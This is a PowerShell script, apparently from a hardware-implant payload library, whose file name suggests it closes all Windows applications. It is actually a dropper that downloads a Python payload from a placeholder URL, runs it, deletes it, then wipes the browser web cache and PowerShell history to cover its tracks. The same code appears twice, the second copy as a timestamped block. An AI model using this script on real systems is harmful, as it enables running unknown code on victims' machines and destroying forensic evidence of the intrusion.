omg-payloads/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1

# Download Python script

# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)

# Execute Python script
& python $savePath

# Delete the downloaded script
Remove-Item $savePath

# Clear the download history from the system's web cache
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force

# Clear the PowerShell command history
Clear-History
script 2023-06-12 09:35:43 +00:00			`# Download Python script`

			`# Reply $scriptUrl with YOUR LINK. The Payload should be script.py`
			`$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"`
			`$savePath = "$env:temp\script.py"`
			`(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)`

			`# Execute Python script`
			`& python $savePath`

			`# Delete the downloaded script`
			`Remove-Item $savePath`

			`# Clear the download history from the system's web cache`
			`Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force`

			`# Clear the PowerShell command history`
			`Clear-History`